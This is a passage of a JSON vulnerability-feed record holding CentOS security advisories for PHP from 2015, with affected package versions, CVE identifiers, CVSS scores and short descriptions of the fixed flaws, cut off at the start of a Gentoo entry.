"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "centos": [{"lastseen": "2017-10-03T18:26:33", "references": ["https://rhn.redhat.com/errata/RHSA-2015-1218.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-imap", "packageFilename": "php-imap-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-mbstring", "packageFilename": "php-mbstring-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-process", "packageFilename": "php-process-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-gd", "packageFilename": "php-gd-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-mysql", "packageFilename": "php-mysql-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-pspell", "packageFilename": "php-pspell-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-bcmath", "packageFilename": "php-bcmath-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-odbc", "packageFilename": "php-odbc-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-pgsql", "packageFilename": "php-pgsql-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-common", "packageFilename": "php-common-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-xmlrpc", "packageFilename": "php-xmlrpc-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-process", "packageFilename": "php-process-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-zts", "packageFilename": "php-zts-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-mysql", "packageFilename": "php-mysql-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-pdo", "packageFilename": "php-pdo-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-enchant", "packageFilename": "php-enchant-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-embedded", "packageFilename": "php-embedded-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-pdo", "packageFilename": "php-pdo-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-mbstring", "packageFilename": "php-mbstring-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php", "packageFilename": "php-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-tidy", "packageFilename": "php-tidy-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-pspell", "packageFilename": "php-pspell-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php", "packageFilename": "php-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-imap", "packageFilename": "php-imap-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-common", "packageFilename": "php-common-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-zts", "packageFilename": "php-zts-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-enchant", "packageFilename": "php-enchant-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-embedded", "packageFilename": "php-embedded-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-fpm", "packageFilename": "php-fpm-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-pgsql", "packageFilename": "php-pgsql-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-ldap", "packageFilename": "php-ldap-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-dba", "packageFilename": "php-dba-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-snmp", "packageFilename": "php-snmp-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-fpm", "packageFilename": "php-fpm-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-dba", "packageFilename": "php-dba-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-snmp", "packageFilename": "php-snmp-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "any", "packageName": "php", "packageFilename": "php-5.3.3-46.el6_6.src.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-intl", "packageFilename": "php-intl-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-devel", "packageFilename": "php-devel-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-bcmath", "packageFilename": "php-bcmath-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-xml", "packageFilename": "php-xml-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-gd", "packageFilename": "php-gd-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-soap", "packageFilename": "php-soap-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-xmlrpc", "packageFilename": "php-xmlrpc-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-tidy", "packageFilename": "php-tidy-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-xml", "packageFilename": "php-xml-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-cli", "packageFilename": "php-cli-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-recode", "packageFilename": "php-recode-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-recode", "packageFilename": "php-recode-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-ldap", "packageFilename": "php-ldap-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-devel", "packageFilename": "php-devel-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-intl", "packageFilename": "php-intl-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "i686", "packageName": "php-soap", "packageFilename": "php-soap-5.3.3-46.el6_6.i686.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-odbc", "packageFilename": "php-odbc-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "6", "packageVersion": "5.3.3-46.el6_6", "arch": "x86_64", "packageName": "php-cli", "packageFilename": "php-cli-5.3.3-46.el6_6.x86_64.rpm", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2015:1218\n\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server.\n\nA flaw was found in the way PHP parsed multipart HTTP POST requests. A\nspecially crafted request could cause PHP to use an excessive amount of CPU\ntime. (CVE-2015-4024)\n\nAn uninitialized pointer use flaw was found in PHP's Exif extension. A\nspecially crafted JPEG or TIFF file could cause a PHP application using the\nexif_read_data() function to crash or, possibly, execute arbitrary code\nwith the privileges of the user running that PHP application.\n(CVE-2015-0232)\n\nAn integer overflow flaw leading to a heap-based buffer overflow was found\nin the way PHP's FTP extension parsed file listing FTP server responses. A\nmalicious FTP server could use this flaw to cause a PHP application to\ncrash or, possibly, execute arbitrary code. (CVE-2015-4022)\n\nMultiple flaws were discovered in the way PHP performed object\nunserialization. Specially crafted input processed by the unserialize()\nfunction could cause a PHP application to crash or, possibly, execute\narbitrary code. (CVE-2015-0273, CVE-2015-2787, CVE-2015-4147,\nCVE-2015-4148, CVE-2015-4599, CVE-2015-4600, CVE-2015-4601, CVE-2015-4602,\nCVE-2015-4603)\n\nIt was found that certain PHP functions did not properly handle file names\ncontaining a NULL character. A remote attacker could possibly use this flaw\nto make a PHP script access unexpected files and bypass intended file\nsystem access restrictions. (CVE-2015-4026, CVE-2015-3411, CVE-2015-3412,\nCVE-2015-4598)\n\nMultiple flaws were found in the way the way PHP's Phar extension parsed\nPhar archives. A specially crafted archive could cause PHP to crash or,\npossibly, execute arbitrary code when opened. (CVE-2015-2301,\nCVE-2015-2783, CVE-2015-3307, CVE-2015-3329, CVE-2015-4021)\n\nA heap buffer overflow flaw was found in the enchant_broker_request_dict()\nfunction of PHP's enchant extension. An attacker able to make a PHP\napplication enchant dictionaries could possibly cause it to crash.\n(CVE-2014-9705)\n\nA buffer over-read flaw was found in the GD library used by the PHP gd\nextension. A specially crafted GIF file could cause a PHP application using\nthe imagecreatefromgif() function to crash. (CVE-2014-9709)\n\nA double free flaw was found in zend_ts_hash_graceful_destroy() function in\nthe PHP ZTS module. This flaw could possibly cause a PHP application to\ncrash. (CVE-2014-9425)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing the\nupdated packages, the httpd daemon must be restarted for the update to\ntake effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2015-July/021237.html\n\n**Affected packages:**\nphp\nphp-bcmath\nphp-cli\nphp-common\nphp-dba\nphp-devel\nphp-embedded\nphp-enchant\nphp-fpm\nphp-gd\nphp-imap\nphp-intl\nphp-ldap\nphp-mbstring\nphp-mysql\nphp-odbc\nphp-pdo\nphp-pgsql\nphp-process\nphp-pspell\nphp-recode\nphp-snmp\nphp-soap\nphp-tidy\nphp-xml\nphp-xmlrpc\nphp-zts\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2015-1218.html", "edition": 1, "reporter": "CentOS Project", "published": "2015-07-09T19:23:41", "title": "php security update", "type": "centos", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-9705", "CVE-2015-2787", "CVE-2015-0232", "CVE-2015-4601", "CVE-2015-2783", "CVE-2015-3329", "CVE-2015-2301", "CVE-2014-9425", "CVE-2014-9709", "CVE-2015-0273", "CVE-2015-4148", "CVE-2015-3307", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4602", "CVE-2015-4026", "CVE-2015-4147", "CVE-2015-3411", "CVE-2015-4600", "CVE-2015-4022", "CVE-2015-3412", "CVE-2015-4603", "CVE-2015-4599", "CVE-2015-4598"], "modified": "2015-07-09T19:23:41", "href": "http://lists.centos.org/pipermail/centos-announce/2015-July/021237.html", "id": "CESA-2015:1218", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-03T18:26:04", "references": ["https://rhn.redhat.com/errata/RHSA-2015-1135.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageFilename": "php-common-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-common", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageFilename": "php-ldap-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-ldap", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageFilename": "php-pgsql-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-pgsql", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageFilename": "php-dba-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-dba", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageFilename": "php-pspell-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-pspell", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageFilename": "php-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageFilename": "php-fpm-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-fpm", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageFilename": "php-odbc-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-odbc", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageFilename": "php-gd-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-gd", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageFilename": "php-process-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-process", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageFilename": "php-mysql-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-mysql", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageFilename": "php-cli-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-cli", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageFilename": "php-embedded-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-embedded", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageFilename": "php-enchant-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-enchant", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageFilename": "php-pdo-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-pdo", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageFilename": "php-xmlrpc-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-xmlrpc", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageFilename": "php-mbstring-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-mbstring", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageFilename": "php-soap-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-soap", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageFilename": "php-mysqlnd-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-mysqlnd", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageFilename": "php-recode-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-recode", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageFilename": "php-intl-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-intl", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageFilename": "php-snmp-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-snmp", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageFilename": "php-xml-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-xml", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageFilename": "php-devel-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageFilename": "php-bcmath-5.4.16-36.el7_1.x86_64.rpm", "packageName": "php-bcmath", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "7", "packageVersion": "5.4.16-36.el7_1", "packageFilename": "php-5.4.16-36.el7_1.src.rpm", "packageName": "php", "arch": "any", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2015:1135\n\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Server.\n\nA flaw was found in the way the PHP module for the Apache httpd web server\nhandled pipelined requests. A remote attacker could use this flaw to\ntrigger the execution of a PHP script in a deinitialized interpreter,\ncausing it to crash or, possibly, execute arbitrary code. (CVE-2015-3330)\n\nA flaw was found in the way PHP parsed multipart HTTP POST requests. A\nspecially crafted request could cause PHP to use an excessive amount of CPU\ntime. (CVE-2015-4024)\n\nAn uninitialized pointer use flaw was found in PHP's Exif extension. A\nspecially crafted JPEG or TIFF file could cause a PHP application using the\nexif_read_data() function to crash or, possibly, execute arbitrary code\nwith the privileges of the user running that PHP application.\n(CVE-2015-0232)\n\nAn integer overflow flaw leading to a heap-based buffer overflow was found\nin the way PHP's FTP extension parsed file listing FTP server responses. A\nmalicious FTP server could use this flaw to cause a PHP application to\ncrash or, possibly, execute arbitrary code. (CVE-2015-4022)\n\nMultiple flaws were discovered in the way PHP performed object\nunserialization. Specially crafted input processed by the unserialize()\nfunction could cause a PHP application to crash or, possibly, execute\narbitrary code. (CVE-2014-8142, CVE-2015-0231, CVE-2015-0273,\nCVE-2015-2787, CVE-2015-4147, CVE-2015-4148, CVE-2015-4599, CVE-2015-4600,\nCVE-2015-4601, CVE-2015-4602, CVE-2015-4603)\n\nIt was found that certain PHP functions did not properly handle file names\ncontaining a NULL character. A remote attacker could possibly use this flaw\nto make a PHP script access unexpected files and bypass intended file\nsystem access restrictions. (CVE-2015-2348, CVE-2015-4025, CVE-2015-4026,\nCVE-2015-3411, CVE-2015-3412, CVE-2015-4598)\n\nMultiple flaws were found in the way the way PHP's Phar extension parsed\nPhar archives. A specially crafted archive could cause PHP to crash or,\npossibly, execute arbitrary code when opened. (CVE-2015-2301,\nCVE-2015-2783, CVE-2015-3307, CVE-2015-3329, CVE-2015-4021)\n\nMultiple flaws were found in PHP's File Information (fileinfo) extension.\nA remote attacker could cause a PHP application to crash if it used\nfileinfo to identify type of attacker supplied files. (CVE-2014-9652,\nCVE-2015-4604, CVE-2015-4605)\n\nA heap buffer overflow flaw was found in the enchant_broker_request_dict()\nfunction of PHP's enchant extension. An attacker able to make a PHP\napplication enchant dictionaries could possibly cause it to crash.\n(CVE-2014-9705)\n\nA buffer over-read flaw was found in the GD library used by the PHP gd\nextension. A specially crafted GIF file could cause a PHP application using\nthe imagecreatefromgif() function to crash. (CVE-2014-9709)\n\nThis update also fixes the following bugs:\n\n* The libgmp library in some cases terminated unexpectedly with a\nsegmentation fault when being used with other libraries that use the GMP\nmemory management. With this update, PHP no longer changes libgmp memory\nallocators, which prevents the described crash from occurring. (BZ#1212305)\n\n* When using the Open Database Connectivity (ODBC) API, the PHP process\nin some cases terminated unexpectedly with a segmentation fault. The\nunderlying code has been adjusted to prevent this crash. (BZ#1212299)\n\n* Previously, running PHP on a big-endian system sometimes led to memory\ncorruption in the fileinfo module. This update adjusts the behavior of\nthe PHP pointer so that it can be freed without causing memory corruption.\n(BZ#1212298)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing the\nupdated packages, the httpd daemon must be restarted for the update to\ntake effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2015-June/021191.html\n\n**Affected packages:**\nphp\nphp-bcmath\nphp-cli\nphp-common\nphp-dba\nphp-devel\nphp-embedded\nphp-enchant\nphp-fpm\nphp-gd\nphp-intl\nphp-ldap\nphp-mbstring\nphp-mysql\nphp-mysqlnd\nphp-odbc\nphp-pdo\nphp-pgsql\nphp-process\nphp-pspell\nphp-recode\nphp-snmp\nphp-soap\nphp-xml\nphp-xmlrpc\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2015-1135.html", "edition": 1, "reporter": "CentOS Project", "published": "2015-06-24T03:28:02", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "php security update", "type": "centos", "bulletinFamily": "unix", "cvelist": ["CVE-2015-2348", "CVE-2014-9705", "CVE-2015-2787", "CVE-2015-0232", "CVE-2015-4601", "CVE-2015-2783", "CVE-2015-3329", "CVE-2015-3330", "CVE-2015-2301", "CVE-2014-9709", "CVE-2015-0273", "CVE-2014-8142", "CVE-2015-4148", "CVE-2015-4605", "CVE-2015-3307", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4602", "CVE-2015-4026", "CVE-2015-4147", "CVE-2015-3411", "CVE-2015-4604", "CVE-2015-4600", "CVE-2015-4022", "CVE-2014-9652", "CVE-2015-3412", "CVE-2015-4603", "CVE-2015-4599", "CVE-2015-4598", "CVE-2015-4643", "CVE-2015-0231"], "modified": "2015-06-24T03:28:02", "href": "http://lists.centos.org/pipermail/centos-announce/2015-June/021191.html", "id": "CESA-2015:1135", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:47:07", "references": ["http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4022", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4644", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2787", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6838", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6835", "https://bugs.gentoo.org/show_bug.cgi?id=555830", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6501", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6837", "https://bugs.gentoo.org/show_bug.cgi?id=573892", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4025", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6833", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4148", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1352", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4026", "https://bugs.gentoo.org/show_bug.cgi?id=549538", "https://bugs.gentoo.org/show_bug.cgi?id=546872", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1351", "https://bugs.gentoo.org/show_bug.cgi?id=562882", "https://bugs.gentoo.org/show_bug.cgi?id=555576", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3330", "https://bugs.gentoo.org/show_bug.cgi?id=556952", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2783", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7803", "https://bugs.gentoo.org/show_bug.cgi?id=577376", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4643", "https://bugs.gentoo.org/show_bug.cgi?id=544330", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6832", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4147", "https://bugs.gentoo.org/show_bug.cgi?id=571254", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6836", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4021", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0231", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4642", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3329", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6831", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6834", "https://bugs.gentoo.org/show_bug.cgi?id=541098", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9709", "https://bugs.gentoo.org/show_bug.cgi?id=544186", "https://bugs.gentoo.org/show_bug.cgi?id=552408", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2348", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2301", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7804", "https://bugs.gentoo.org/show_bug.cgi?id=559612", "https://bugs.gentoo.org/show_bug.cgi?id=537586", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0273", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9705"], "affectedPackage": [{"OS": "Gentoo", "OSVersion": "any", "packageVersion": "5.6.19", "packageFilename": 